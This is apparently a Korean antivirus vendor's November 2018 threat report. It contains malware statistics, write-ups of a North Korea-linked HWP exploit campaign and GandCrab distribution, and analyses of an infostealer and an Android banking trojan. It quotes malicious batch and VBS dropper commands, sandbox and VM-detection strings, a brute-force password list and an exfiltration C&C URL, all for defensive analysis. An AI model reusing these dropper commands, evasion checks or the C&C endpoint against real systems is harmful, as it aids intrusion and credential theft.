01 이스트시큐리티통계및분석 No 이스트시큐리티보안동향보고서 CONTENT 01 악성코드통계및분석 악성코드동향 알약악성코드탐지통계 랜섬웨어차단및악성코드유포지 / 경유지 URL 통계 02 전문가보안기고 금성 121 정부기반 AP

01 이스트시큐리티통계및분석 이스트시큐리티 보안동향보고서 No.110 2018.11

01 이스트시큐리티통계및분석 No.110 2018.11 이스트시큐리티보안동향보고서 CONTENT 01 악성코드통계및분석 악성코드동향 01-05 알약악성코드탐지통계 랜섬웨어차단및악성코드유포지 / 경유지 URL 통계 02 전문가보안기고 06-18 금성 121 정부기반 APT 그룹, 코리안스워드 작전수행중 비너스락커랜섬웨어조직, 베리즈웹쉐어를통해갠드크랩국내다량유포 03 악성코드분석보고 19-38 개요 악성코드상세분석 결론 04 해외보안동향 39-54 영미권 중국 일본

이스트시큐리티보안동향보고서 01 악성코드통계및분석 악성코드동향 알약악성코드탐지통계 랜섬웨어차단및악성코드유포지 / 경유지 URL 통계 1

01 악성코드통계및분석 1. 악성코드동향 GandCrab 랜섬웨어는 10 월말기준으로 5.0.5 변종까지등장했고, 해피바이러스, 배틀크루저등의 APT 공격및 KRBanker 파밍악성코드의등장, 그리고페이스북과구글플러스같은글로벌서비스에대한침해공격까지발생한 다사다난한 10 월이었습니다. 9월말들어, v5 가등장한 GandCrab 은그이후로도 10 월한달동안 v5.0.5 까지업데이트를지속적으로진행하고있습니다. 특히 10 월 26 일비트디펜더에서릴리즈한 GandCrab 랜섬웨어복호화툴이등장하자마자, GandCrab 랜섬웨어는바로해당복호화툴로복호화가불가능한 v5.0.5 버전으로업데이트하는긴밀한대응까지보여주고있습니다. 문서파일취약점을악용하여이메일첨부파일을통해스피어피싱을진행하는 해피바이러스 오퍼레이션이확인되기도 하였으며, 이미지난 3 월에있었던라자루스 (Lazarus) 공격그룹의 배틀크루저 오퍼레이션의변종이국내 유명변호사의이름을사칭한이메일과함께유포되기도하였습니다. 또한, 10 월중순이후부터유명걸그룹의음란동영상이있는것처럼사칭하여유명커뮤니티에관련페이지로이동할수있는게시글을올려사용자를피싱사이트로유도하는피싱공격이여러차례확인되었고국내유명사이버학습원에서 CK VIP exploit 을통해 KRBanker 악성코드를유포하는파밍공격정황이확인되기도하였습니다. 특히국내웹사이트를해킹하여해당사이트의정상스크립트파일내부에악성스크립트를삽입하여사이트방문자로하여금 Drive by Download 기법을통해악성코드를다운로드및실행시키는공격은 2017 년부터거의보이지않았는데, 이번 10 월에오래간만에등장하여향후추이를주목해야봐야할것같습니다. 국내뿐만아니라, 해외에서도구글이운영하는 SNS 인구글플러스의사용자 50 만명의개인정보가유출되기도하였는데, 구글은이번유출사고가발생한후일반사용자용구글플러스의서비스를 2019 년 8월에종료하기로결정하였습니다. 페이스북도페이스북플랫폼의제로데이취약점이악용되어 5천만사용자계정의비밀액세스토큰이탈취되었다고발표하기도했습니다. 랜섬웨어, 이메일첨부파일을활용한 APT 공격, 피싱, Drive by Download 공격을활용한파밍, 대규모유출사고까지정말다양한카테고리의다양한침해공격이있었습니다. 이렇게다양한공격이발생하는데도대체어떻게대비해야되는지막막하신가요? 사용자여러분들이취할수있는기본조치는 OS 와사용중인프로그램에대한최신패치그리고알약과같은신뢰할수있는백신을사용하는것입니다. 이스트시큐리티는현재 Threat Inside 이벤트를통해 시큐리티브리핑 을제공하고있습니다. 발빠른데일리악성코드이슈와보안소식을접하실수있는데해당서비스를활용해보시는것도조금더안전하게여러분의정보자산을보호할수있는방법중하나일것입니다. 2

01 악성코드통계및분석 2. 알약악성코드탐지통계 감염악성코드 TOP15 2018 년 10 월의감염악성코드 Top 15 리스트에서는지난 2018 년 8월부터꾸준히 1위를차지했던 Trojan.Agent.gen 이이번달 Top 15 리스트에서도 1위를차지했다. 9월에각각 2위와 3위를차지했던 Misc.HackTool.AutoKMS 와 Misc.HackTool.KMSActivator 도제자리를지켰다. 또한, 지난달 5 위를차지했었던 Misc.HackTool.KMSActivator 가 2 단계상승하여이번달 3 위를차지하였다. 전반적으로악성코드진단수치자체가지난 9 월과대비하여크게증가하는추세를보였다. 순위 등락 악성코드진단명 카테고리 합계 ( 감염자수 ) 1 - Trojan.Agent.gen Trojan 1,335,978 2 - Misc.HackTool.AutoKMS Trojan 861,837 3 - Misc.HackTool.KMSActivator Trojan 482,068 4 1 Trojan.HTML.Ramnit.A Trojan 429,294 5 1 Gen:Variant.Razy.107843 Trojan 342,522 6 2 Misc.Keygen Trojan 298,785 7 2 Win32.Neshta.A Virus 287,886 8 2 Adware.SearchSuite Adware 264,972 9 2 Trojan.LNK.Gen Trojan 230,529 10 4 Exploit.CVE-2010-2568.Gen Exploit 214,122 11 2 Worm.ACAD.Bursted.doc.B Worm 176,646 12 New Worm.Brontok-F Worm 172,666 13 2 Win32.Ramnit.N Virus 172,301 14 4 Misc.Riskware.BitCoinMiner Trojan 167,256 15 New Trojan.ShadowBrokers.A Trojan 156,053 * 자체수집, 신고된사용자의감염통계를합산하여산출한순위임 2018 년 10 월 01 일 ~ 2018 년 10 월 31 일 3

01 악성코드통계및분석 악성코드유형별비율 악성코드유형별비율에서트로이목마 (Trojan) 유형이가장많은 77% 를차지했으며바이러스 (Virus) 유형이 8% 로그 뒤를이었다. 웜 6% 취약점애드웨어 4% 5% 바이러스 8% 트로이목마 77% 트로이목마 (Trojan) 스파이웨어 (Spyware) 애드웨어 (Adware) 취약점 (Exploit) 웜 (Worm) 기타 (Etc) 백도어 (Backdoor) 바이러스 (Virus) 하이재커 (Hijacker) 호스트파일 (Host) 카테고리별악성코드비율전월비교 10 월에는 9 월과비교하여트로이목마 (Trojan) 악성코드감염카테고리비율이 79% 에서 77% 로소폭감소하였다. 다른영역에서의감염카테고리비율은대동소이했으며웜 (Worm) 악성코드와취약점 (Exploit) 악성코드감염비율이 9 월에비해 10 월이 2 배가량높아졌다. 트로이목마 (Trojan) 스파이웨어 (Spyware) 애드웨어 (Adware) 하이재커 (Hijacker) 웜 (Worm) 취약점 (Exploit) 바이러스 (Virus) 백도어 (Backdoor) 호스트파일 (Host) 기타 (Etc) 0% 0% 5% 5% 0% 0% 6% 3% 4% 2% 8% 7% 0% 0% 0% 4% 0% 0% 77% 79% 100% 100% 10 월 9 월 0% 20% 40% 60% 80% 100% 4

01 악성코드통계및분석 3. 랜섬웨어차단및악성코드유포지 / 경유지 URL 통계 9 월랜섬웨어차단통계 해당통계는통합백신알약공개용버전의 랜섬웨어차단 기능을통해수집한월간통계로써, DB 에의한시그니쳐 탐지횟수는통계에포함되지않는다. 10 월 1 일부터 10 월 31 일까지총 109,321 건의랜섬웨어공격시도가차단되었다. 주말과연휴를제외하면꾸준하게하루 4,000 여건이상의랜섬웨어공격차단이이뤄지고있다. 10 월랜섬웨어차단통계 5,000 4,500 4,000 3,500 3,000 2,500 2,000 1,500 1,000 500 0 1 2 3 4 5 6 7 8 9 101112131415161718192021222324252627282930 악성코드유포지 / 경유지 URL 통계 해당통계는 Threat Inside 에서수집한악성코드유포지 / 경유지 URL 에대한월간통계로, 10 월한달간총 15,113 건의악성코드유포지 / 경유지 URL 이확인되었다. 10월악성URL 유포지 / 경유지통계 12000 10000 8000 6000 4000 2000 0 유포지 경유지 유포지 경유지 5

이스트시큐리티보안동향보고서 02 전문가보안기고 1. 금성 121(Geumseong121) 정부기반 APT 그룹, ' 코리안스워드 (Operation Korean Sword) 작전 ' 수행중 2. 비너스락커랜섬웨어조직, 베리즈웹쉐어를통해갠드크랩국내다량유포 6

02 전문가보안기고 1. 금성 121(Geumseong121) 정부기반 APT 그룹, ' 코리안스워드 (Operation Korean Sword) 작전 ' 수행중 특정정부가배후에있는것으로알려져있는위협그룹중에 ' 금성 121(Geumseong121)' 조직은글로벌보안회사들이 다양한이름으로명명하고있습니다. 그중대표적그룹명을알파벳순으로나열하면 'APT37', 'Group123', 'RedEyes', 'ScarCruft' 등이있습니다. 지난 02 월이스트시큐리티사이버위협인텔리전스 (CTI) 전문조직인시큐리티대응센터 ( 이하 ESRC) 에서는이 위협그룹이카카오톡메신저로 'Flash Player Zero-day (CVE-2018-4878)' 취약점공격을수행한사례를소개한바 있으며, 그이후에도스피어피싱 (Spear Phishing) 을통해한국에집중표적공격을수행하고있다는것을확인했습니다. 그리고 07 월 ~08 월에는 ' 남북이산가족찾기전수조사 ' 내용으로 APT 공격을수행한사례와 ' 작전명로켓맨 (Operation Rocket Man)' 분석자료를공개한바있습니다. 물론, 아직공개되지않은실제침해사고사례들이다양하게존재합니다. 금성 121 APT ' 작전명코리안스워드 (Operation Korean Sword)' 공개하지않았던사례중한국의대북관련단체나활동가들을상대로다음과같은스피어피싱기반이수행되었고, 이 공격벡터는 08 월부터 09 월까지문서내용이동일하지만코드가달라진변종이연속적으로발견됩니다. 악성문서파일의타이틀은 '7 주신뢰와배려의커뮤니케이션 ' 이며이내용은여러보안전문가들이분석한자료를 공개한바있고, ' 중국보안업체 360 이블로그를통해분석자료 ' 를자세히공개한바있습니다. 7

02 전문가보안기고 [ 그림 1] 스피어피싱을통해유포된악성문서파일실행화면 ESRC 는 'TTPs [Tactics( 전술 ), Techniques( 기술 ), Procedures( 절차 )]' 분석을통해금성 121 APT 위협그룹이지속적으로 대남사이버작전을수행하고있는것을확인할수있었습니다. 해당위협그룹은한국의대북분야활동가들을주요타깃으로삼고있으며, 주로단체나개인을겨냥해감염된 컴퓨터의내부자료를은밀히탈취하는공통특징이존재합니다. 사이버전술적으로한국의기관이나기업에서많이사용하는 HWP 문서파일취약점이빈번히사용되며, DOC 문서의 매크로실행유도나 XLS 문서에플래시취약점을삽입하는기술을구사한바도있습니다. 8

02 전문가보안기고 APT 공격조직주체를파악하는데는공격벡터와페이로드기능을제대로분석하는것이매우중요하고, 조직에속한 공격자개개인별고유습관및특성지표를정의하고관리할필요가있습니다. 지난 08 월과 09 월에각각제작된 HWP 악성문서파일은최종수정시점만다르고, 동일한생성날짜와시간을가지고 있으며, 문서작성자나마지막저장자의데이터가 'gichang', 'User1' 코드로동일합니다. ESRC 는악성문서에서발견된 'gichang' 키워드와발음을활용해고려시대호위부대가무예로사용한기창 ( 깃발달린 창 ) 을활용해 ' 작전명코리안스워드 (Operation Korean Sword)' 로명명하였습니다. [ 그림 2] 동일한내용을담고있는악성문서파일의메타데이터비교화면 포스트스크립트 (EPS) 취약점코드를분석해보면, 공격패턴에서조금씩변화되는부분이존재합니다. 초기에는 시작프로그램경로에배치파일 (BAT) 명령어를추가해재부팅시자동실행되도록만들었습니다. copy /b "%appdata%\*.oju01" "%appdata%\winupdate148399843.pif" & "%appdata%\winupdate148399843.pif" & del /f "%appdata%\winupdate148399843.pif" 9

02 전문가보안기고 그다음변종코드에서는배치파일 (BAT) 을시작프로그램에바로등록하지않고, 비주얼베이직스크립트 (VBS) 를 시작프로그램경로에등록하고, 그다음에배치파일이로딩되도록전략을수정했습니다. Set WshShell = CreateObject("WScript.shell") WshShell.Run chr(34) & "%appdata%\upgradever49.bat" & chr(34), 0 Set WsheShell = Nothing VBS 파일의쉘명령에의해실행되는 BAT 파일은시작프로그램에있던 VBS 삭제코드가추가된점이다릅니다. copy /b "%appdata%\*.cog01" "%appdata%\winupdate75610890.pif" & "%appdata%\winupdate75610890.pif" & del /f "%appdata%\winupdate75610890.pif" & del /f "%appdata%\microsoft\windows\start Menu\Programs\StartUp\*.vbs" & del /f "%appdata%\*01" & del /f "%appdata%\*.bat" 10

02 전문가보안기고 [ 그림 3] HWP 악성문서에포함되어있는포스트스크립트실행과정화면 악성코드는보안제품의탐지를회피하기위한목적등으로 EXE 실행파일의 MZ 헤더코드를분리해서설치한후다시 결합하는절차를수행합니다. 11

02 전문가보안기고 생성되는 'Dhh01.oju01', 'Dee01.cog01' 파일에는 '4D', '5A' 2 바이트 (MZ) 만가지고있으며 'Dhh02.oju01', 'Dee02.cog01' 파일에나머지실행파일데이터를가지고있습니다. 그리고최종페이로드는더미다 (Themida) 암호화프로그램으로패킹되어있으며, 이파일은기존 ' 금성 121' 그룹이 사용하는대표적인 RAT 기능을수행하게됩니다. 2018 년 11 월, 다시돌아온 ' 작전명코리안스워드 (Operation Korean Sword)' ESRC 는 2018 년 11 월 16 일기존과동일한공격벡터를가진침해지표를발견했고, 이공격이지난 8 월부터있었던 작전명코리안스워드의연장선이라는것을확인했습니다. 이번에발견된것은 ' 기록부.hwp' 한글파일명으로발견되었으며, 실행되면손상된파일처럼알수없는내용이 보여지게되면서, EPS 취약점코드가실행됩니다. [ 그림 4] ' 기록부.hwp' 문서파일실행된화면 12

02 전문가보안기고 악성문서파일은 2018 년 11 월 16 일제작된것을확인할수있으며, 'BinData' 스트림에 'BIN0001.eps' 포스트 스크립트코드가포함된것을확인할수있습니다. [ 그림 5] 악성문서내부에포함된날짜와포스트스크립트 포스트스크립트는시작프로그램경로에 'MemCacheLog24.vbs' 스크립트를생성하고, 다음과같은내부명령에의해 'Cache51.bat' 배치파일을실행하게됩니다. Set WshShell = CreateObject("WScript.shell") WshShell.Run chr(34) & "%appdata%\cache51.bat" & chr(34), 0 Set WsheShell = Nothing 'Cache51.bat' 배치파일명령에는다음과같이 '*.hje01' 파일을 'MemoryOrder85584031.com' 바이너리파일로 합치고, 실행한후삭제하게됩니다. copy /b "%appdata%\*.hje01" "%appdata%\memoryorder85584031.com" & "%appdata%\memoryorder85584031.com" & del /f "%appdata%\memoryorder85584031.com" 13

02 전문가보안기고 [ 그림 6] 악성포스트스크립트실행코드순서및화면 마지막에생성되는 'MemoryOrder85584031.com' 페이로드는한국시간기준으로 '2018-11-15 00:47:51' 제작되었고, 내부에포함되어있는최종페이로드는 '2018-11-07 16:06:11' 제작되었습니다. 감염된페이로드는감염된시스템의정보를수집해 Yandex 토큰을이용해유출하게되며, 공격자의추가적인명령을 받게됩니다. 14

02 전문가보안기고 [ 그림 7] 정보가유출되는 C2 Yandex 서비스화면코드 HWP 문서파일에포함된포스트스크립트 (EPS) 취약점은한컴오피스제품을최신버전으로업데이트할경우고스트 스크립트엔진모듈이제거되어더이상위협에노출되지않습니다. 보안위협은업데이트를하지않은이용자를노리고있다는점을명심해야합니다. 보다추가적인내용들은 쓰렛인사이드 (Threat Inside) 를통해보다체계적인위협정보 (IoC) 와전문화된인텔리전스 리포트서비스를기업대상으로제공할예정입니다. 15

02 전문가보안기고 2. 비너스락커랜섬웨어조직, 베리즈 웹쉐어를통해갠드크랩국내다량유포 이스트시큐리티사이버위협인텔리전스 (CTI) 전문조직인시큐리티대응센터 ( 이하 ESRC) 는과거 비너스락커 (VenusLocker) 랜섬웨어를뿌렸던조직이지난 11 월 15 일입사지원서를사칭해 갠드크랩 (GandCrab) v5.0.4 랜섬웨어를한국에대량으로유포하고있는내용을공개한바있습니다. 동일한조직이지난주말부터한국에서개발된 'Berryz WebShare ( 베리즈웹쉐어 )' 파일공유서버를구축해또다른 갠드크랩 v5.0.4 변종을유포하고있어각별한주의가요망됩니다. [ 그림 1] 베리즈웹쉐어서버로유포중인갠드크랩랜섬웨어화면 ESRC 에서는해당위협조직이지난주이미해당서버를구축하고있다는사실을확인해, 지속적으로공격자를추적 감시하고있었습니다. 지난주에는 'Mongoose Web Server ( 몽구스웹서버 )' 기반으로랜섬웨어를유포하였는데, 17 일주말부터는 'Berryz WebShare( 베리즈웹쉐어 )' 서버를구축해유포에사용하고있는상태입니다. 16

02 전문가보안기고 [ 그림 2] 몽구스웹서버로갠드크랩랜섬웨어를유포했던화면 베리즈웹쉐어에는 2 개의파일이업로드되어있으며, 파일명은각각 ' 박혜윤 _ 이력서 (181119) 열심히하겠습니다.exe', ' 이미지무단사용관련내용확인 ( 박혜윤작가 ).exe' 다르게등록되어있습니다. 하지만두개의파일은이름만다른동일한갠드크랩랜섬웨어입니다. [ 그림 3] 이력서등으로위장하고, 워드파일로위장한갠드크랩랜섬웨어화면 비너스락커랜섬웨어를유포했던위협조직들이한국에집중적으로최신랜섬웨어를유포하고있어, 각별한주의가 필요한상태입니다. 이용자가해당파일에현혹되어실행할경우컴퓨터에보관되어있던문서, 동영상, 사진등대부분의데이터가 암호화되어사용이불가능해집니다. 17

02 전문가보안기고 [ 그림 4] 갠드크랩 v5.0.4 감염시생성되는랜섬노트화면 해당랜섬웨어에감염되면대부분의데이터파일이암호화되고, 기존확장자에 '.extsxcdshg' 내용이추가될수 있습니다. 그리고다수의경로에랜섬노트 'EXTSXCDSHG-DECRYPT.txt' 파일이생성됩니다. ESRC 에서는 19 일오전부터다수의랜섬웨어행위차단통계를기반으로갠드크랩변종의긴급패턴업데이트를 완료한상태이고, 알약 (ALYac) 랜섬웨어행위기반차단로직을통해감염활동을신속히차단할수있는상태입니다. 공격자는이메일첨부파일이나본문 URL 링크를통해지속적으로한국에변종랜섬웨어를유포하고있습니다. 유사한 위협이앞으로도지속될것으로전망되고있으므로, 인터넷이용자분들은각별히주의하시길바랍니다. 18

이스트시큐리티보안동향보고서 03 악성코드분석보고 개요 악성코드상세분석 결론 19

03 악성코드분석보고 [Trojan.Agent.544256] 악성코드분석보고서 1. 개요 최근사용자 PC 를감염시켜사용자정보를탈취하는 Infostealer 유형의악성코드가꾸준히발견되고있다. 이번에 발견된악성코드는분석시스템또는분석가를통한분석을회피하기위한기술들이다수적용되어있다. 감염 PC 의 분석환경구성여부를확인하여악성행위를수행할것인지결정하는것이특징이다. 이번보고서에서는해당악성코드에적용된기술들과악성행위에대해서상세하게알아보고자한다. 20

03 악성코드분석보고 2. 악성코드상세분석 2.1. 가상환경탐지및분석회피 공격자는악성코드분석시스템또는분석가를통한분석을방해하기위하여가상환경탐지, 안티디버깅등을 사용한다. 이를통해분석환경이탐지되면악성행위를수행하지않고종료한다. 1) 현재파일이름검색 현재실행되는파일명이다음과같을경우자가종료를수행한다. 이는악성코드분석중사용할수 있는파일명으로, 분석환경을판단하기위한방법중하나로보인다. sandbox, malware, sample, virus, self [ 표 1] 분석환경탐지파일명목록 2) 안티바이러스및분석툴검색 또한, 현재 PC 에서실행되고있는프로세스들을검색하여다음과같은프로세스가실행중인지확인한다. 이는분석환 경을판단하고안티바이러스제품으로부터탐지되는것을방지하기위함으로보인다. avastsvc.exe, aavastui.exe, avgsvc.exe, iavgui.exe, procexp64.exe, procmon64.eee, procmon.exe, ollydbg.exe, procexp.exe, windbg.exe [ 표 2] 안티바이러스및분석툴프로세스목록 3) 안티디버깅 부착된디버거존재유무를확인하기위해프로세스정보를담고있는 Process Environment Block 구조체의 BeingDebuged 값과 Native API 인 ZwqueryInformationProcess 반환값을확인한다. [ 그림 1] ProcessDebugObjectHandle 을이용한디버깅확인 21

03 악성코드분석보고 4) 가상환경탐지 프로세서종류를확인하는명령어인 CPUID 를이용하여현재시스템환경이가상에서실행되고있는지확인한다. 파라미터 (EAX) 값이 0x40000000 일때, 가상환경이라면 EBX, ECX, EDX 값을통해특정문자열을반환한다. [ 그림 1] CPUID 를이용한가상환경탐지 KVM Microsoft Hyper-V KVMKVMKVM\0\0\0" "Microsoft Hv" VMware VMwareVMware " Xen XenVMMXenVMM " Parallels VirtualBox prl hyperv" VBoxVBoxVBox [ 표 3] 가상머신별반환문자열 5) 코드난독화 코드내에실행되지않는코드를삽입하여디버거나디스어셈블러에서정상적으로번역하지못하게한다. [ 그림 3] 코드내에삽입된더미코드 22

03 악성코드분석보고 뿐만아니라, 함수포인터를통하여더미코드들과실제악성행위코드를함께호출시켜분석을방해한다. [ 그림 4] 함수호출코드 2.2. 정보탈취 분석환경이확인되지않을경우, 설치된파일과레지스트리등을사용하여사용자의정보를수집한다. 수집하는정보는 다음과같다. 탈취정보로컬 PC 정보 FTP 계정정보이메일 / 계정정보브라우저관련정보 상세내용 User Name, OS Version, 국적, 권한, MAC 주소등 ALFTP, BlazeFtp, LinasFTP, NovaFTP, FTPVoyager, wiseftp 등 Outlook / POP3 / IMAP / NNTP / HTTPMail / SMTP 등 Internet Explorer, Chrome, Firefox, Opera, Thunderbird, SeaMonkey 등 [ 표 4] 탈취항목 또한, PC 에등록된계정들을확인하고계정탈취를위해무작위대입식공격인브루트포싱공격을시작한다. 다음은 브루트포싱공격코드이다. 23

03 악성코드분석보고 [ 그림 5] 브루트포싱공격코드 다음은브루트포싱공격에사용되는비밀번호리스트이다. '1234567890', 'gfhjkm', 'ghbdtn', 'billgates', 'gates', 'mustdie', 'windows', 'hotdog', 'prayer', 'stella', 'cassie', 'kitten', 'danielle', 'jasper', 'hallo', '112233', 'saved', 'dexter', 'hardcore', 'angel1', '55555', 'chelsea', 'qwert', 'prince', 'blabla', 'red123', 'baby', '1q2w3e4r', 'john', 'jason', 'maxwell', 'sammy', 'fuckoff', 'scooby', 'emmanuel', 'nathan', 'loving', 'football1', 'ilovegod', 'jordan23', 'cocacola', '11111111', 'bubbles', '222222', 'microsoft', 'none', 'destiny', 'friend', 'church', 'mylove', 'david', 'onelove', 'maverick', 'testtest', 'green', 'dallas', 'mike', 'samuel', 'zxcvbnm', 'praise', 'wisdom', 'slayer', 'rotimi', 'adidas', 'foobar', 'creative', 'qwerty1', 'knight', 'genesis', 'viper', '1q2w3e', 'iloveyou!', 'benjamin', 'power', 'hockey', 'corvette', 'anthony', 'enter', 'bandit', 'spirit', 'thunder', 'digital', 'lucky', 'joseph', '7777', 'smokey', 'harley', 'looking', 'nintendo', 'shalom', 'hope', 'friends', 'google', 'merlin', 'admin', 'sparky', 'austin', 'passw0rd', 'chris', 'junior', 'chicken', '123abc', 'online', 'trinity', 'maggie', 'winner', 'george', 'startrek', '123321', '123qwe', 'london', 'victory', 'asdfasdf', 'james', 'banana', 'scooter', 'flower', 'cool', 'peaches', 'blink182', 'richard', 'john316', 'forum', 'taylor', 'diamond', 'compaq', 'samantha', 'dakota', 'eminem', 'hello1', 'biteme', 'mickey', 'soccer1', 'bailey', 'cookie', 'batman', 'peanut', 'guitar', 'rainbow', 'rachel', 'asdfgh', 'forever', 'robert', 'silver', 'canada', 'matthew', 'myspace1', 'blahblah', 'blessing', 'poop', 'hahaha', 'asshole', 'fuckyou1', 'gateway', 'muffin', '666666', 'nicole', 'iloveyou2', 'william', 'grace', 'secret', 'peace', 'michelle', 'apple', 'testing', 'orange', 'jasmine', 'justin', 'helpme', 'mustang', '11111', 'iloveyou1', 'pokemon', 'welcome', 'jessica', 'snoopy', 'mother', 'ginger', 'nothing', 'amanda', '654321', 'aaaaaa', 'pass', 'matrix', 'happy', 'qazwsx', 'hannah', 'single', 'jennifer', '1111', 'daniel', 'charlie', 'angels', 24

03 악성코드분석보고 'thomas', 'andrew', 'lovely', 'hunter', '7777777', 'pepper', 'heaven', 'buster', 'ashley', 'summer', 'faith', 'jordan', 'purple', '000000', 'starwars', 'baseball', 'blessed', 'fuckyou', 'joshua', 'internet', 'cheese', 'michael', 'superman', 'soccer', 'asdf', 'killer', 'freedom', 'whatever', '123123', 'jesus1', 'angel', 'football', 'tigger', 'princess', 'computer', 'master', 'sunshine', 'christ', '123456789', 'shadow', '1234567', 'iloveyou', '111111', 'trustno1', 'dragon', 'monkey', 'hello', 'password1', 'love', 'test', 'letmein', 'abc123', '1234', '12345678', 'jesus', '12345', 'qwerty', 'phpbb', 'password', '123456' [ 표 5] 브루트포싱에사용되는비밀번호목록 위과정을통해탈취된정보들은암호화하여공격자서버인 http://62.108.40.55/k5/gate.php 로전송된다. 하지만 현재는 C&C 서버가차단돼연결되지않는다. 다음은정보전송코드이다. [ 그림 6] C&C 정보전송코드 25

03 악성코드분석보고 2.3. 자가삭제 정보탈취기능을모두수행한뒤, [ 임의명 ].bat 형식의파일을생성한다. 해당파일은자가삭제기능을수행한다. 이는 감염 PC 로부터악성코드를삭제하여수집이어렵도록하기위함으로보인다. 다음은자가삭제코드이다. [ 그림 7] 자가삭제코드 26

03 악성코드분석보고 3. 결론 본악성코드는사용자정보를탈취하는것을주목적으로한다. 특히 FTP 나브라우저, 이메일관련프로그램에서민감한 사용자계정정보를탈취하기때문에 2 차피해가야기될수있어각별한주의가필요하다. 해당악성코드는로컬 PC 의사용자계정정보탈취를위해부르트포싱공격을사용한다. 이때사용되는비밀번호리스트는비교적간단한영어단어및숫자형식을가진다. 부르트포싱공격을예방하기위해서사용자들은영문대문자와숫자, 특수문자등을이용해복잡한조합의비밀번호를사용해야하며, 주기적으로비밀번호를변경해주는습관을가질필요가있다. 이러한악성코드에감염이되지않기위해서출처가불분명한이메일에있는링크혹은첨부파일에대해열람을삼가야 한다. 또한백신을최신업데이트상태로유지하며주기적인검사를실시하여야한다. 현재알약에서는 Trojan.Agent. 544256 로진단하고있다. 27

03 악성코드분석보고 [Trojan.Android. KRBanker] 악성코드분석보고서 1. 개요 스미싱과보이스피싱등을결합한형태로악성앱들이유포되고있다. 해당앱들은주로 1 금융관련앱을사칭하였으나최근에는국가기관, 2 금융사칭등으로다양한형태로나타나고있다. 기기및개인정보를탈취하고금융정보탈취를목적으로기기의통화상태를감시한다. 특히, 해당앱은분석을어렵게하기위해서중국 Qihoo 360 사의패킹기술을적용하였다. 본분석보고서에서는 Trojan.Android. KRBanker 를상세분석하고자한다. 28

03 악성코드분석보고 2. 악성코드상세분석 2.1. 패킹특징중국 Qihoo 360 사의패킹된앱은일반앱과는다른부분이존재한다. 앱의권한과컴포넌트관련정보를볼수있는매니페스트를보면일반안드로이드앱에서는볼수없는항목인 android:qihoo 부분이추가되어있는데이는디컴파일을방해한다. assets 폴더에는파일의무결성과동적패킹에관여하는.appkey, libjiagu.so 파일이포함되어있다. 또한, 아래 [ 그림 2] 를보면패키지명이 com.android.hellod3 이지만, 패킹된덱스코드에서는해당부분을찾을수없어정적분석으로는실제악성행위와관련된코드를볼수없다. [ 그림 1] 패킹된앱의구조 29

03 악성코드분석보고 [ 그림 2] 패킹전후덱스코드비교 2.2 안티디컴파일러앱디컴파일에흔히쓰이는 apktool 최신버전을통해서컴파일을시도하면매니페스트의 qihoo 와관련된요소를찾을수없다고하여에러를일으킨다. 앱의동적분석을위해서는매니페스트에 android:debuggable="true" 항목이필요한데이를방지한다. [ 그림 3] 컴파일실패 2.3 안티디버깅패킹앱의초기에는안티디버깅이포함되어있지않아서메모리에로드된덱스파일을실시간덤프를함으로써간단히패킹앱의분석이가능했다. 그러나최근패킹앱에는다양한안티디버깅기법이추가되었기때문에동적분석을통해서안티디버깅을우회한다음에서야메모리에로드된덱스파일덤프가가능하다. 2.3.1 dlactivity 확인 /system/linker 모듈내부에존재하는 dl_rtld_db_dlactivity 의값은디버깅되고있는지없는지를나타낸다. 30

03 악성코드분석보고 [ 그림 4] dlactivity 활용안티디버깅 2.3.2 TracerPid 확인 /proc/self/status 파일을확인해보면앱과관련된정보들이나타나있다. 그중에서 TracerPid 의값을통해서디버깅 여부를확인할수있다. 31

03 악성코드분석보고 [ 그림 5] TracerPid 활용안티디버깅 2.3.3 주소활성화여부확인 주소와포트를확인하여디버깅여부를확인한다. IDA 를통해서안드로이드원격디버깅이가능한데, IDA 의기본 디버깅주소와포트의활성화여부를확인하여디버깅여부를확인한다. [ 그림 6] 주소확인을통한안티디버깅 32

03 악성코드분석보고 2.3.4 특정문자확인 gdb, android_server 등의동적디버깅에사용되는도구들의명령어및메모리상의관련문자열확인을통해서 디버깅여부를확인한다. [ 그림 7] 명령어및메모리확인을통한안티디버깅 2.3.5 시간확인 코드실행중간중간에시간관련함수를추가하여해당코드의실행시간을계산하여디버깅여부를확인한다. [ 그림 8] 시간확인을통한안티디버깅 33

03 악성코드분석보고 2.3.6 덱스파일덤프안티디버깅을모두우회하면복호화된덱스파일은 libart.so 모듈에의해서메모리로로드되는데, 이때덱스파일이로드된메모리주소와덱스파일구조에기록되어있는덱스파일의크기를계산하여해당부분을덤프한다. 다음실제코드가담긴덱스코드를분석한다. [ 그림 9] 덱스파일덤프 34

03 악성코드분석보고 2.4 덱스파일분석 assets 폴더에는 image.zip 파일이있는데내부에는악성행위에사용되는가짜통화관련사진과악성앱을 구성하는여러개의사진등이있다. [ 그림 10] 악성앱에사용되는파일 기기의아이디와전화번호를탈취하여식별정보로사용한다. [ 그림 11] 기기정보탈취 35

03 악성코드분석보고 기기부팅시서비스를실행시켜지속적인악성행위를가능토록한다. [ 그림 12] 기기부팅시재실행 안드로이드정책에서는일정시간동안와이파이를사용하지않으면꺼지게되는데이를방지하여 C&C 와의지속적인 통신을가능토록한다. [ 그림 13] 지속적인와이파이연결 메시지를주기적으로감시하고탈취하여 C&C 서버로전송한다. [ 그림 14] 메시지탈취 주소록을주기적으로감시하고탈취하여 C&C 서버로전송한다. 36

03 악성코드분석보고 [ 그림 15] 주소록탈취 통화상태를확인하고특정번호를감시하여해커에게연결되도록하고사용자를속이기위해서가짜통화사진을 팝업한다. [ 그림 16] 통화탈취 C&C 서버는 lib 폴더의 libmasker.so 파일내부의함수호출을통해서불러온다. [ 그림 17] C&C 서버 37

03 악성코드분석보고 3. 결론 해당악성앱은금융권앱의아이콘과이름을사칭한다. 사용자의기기및개인정보를탈취하고전화상태를확인하여 특정번호를감시한다. 통화를종료하고해커에게전화를자동으로걸도록하여금융정보를탈취한다. 특히, 앱의 분석을어렵게하기위해서중국의 Qihoo 360 의패킹을적용했다. 따라서, 악성앱으로부터피해를최소화하기위해서는백신앱을통한주기적인검사가중요하다. 출처가불명확한 URL 과파일은실행하지않는것이기본이고공식마켓인구글플레이스토어를통해서확보한앱이라도백신앱을추가 설치하여주기적으로업데이트하고검사해야한다. 현재알약 M 에서는해당앱을 Trojan.Android.KRBanker 탐지명으로진단하고있다. 38

이스트시큐리티보안동향보고서 04 해외보안동향 영미권 중국 일본 39

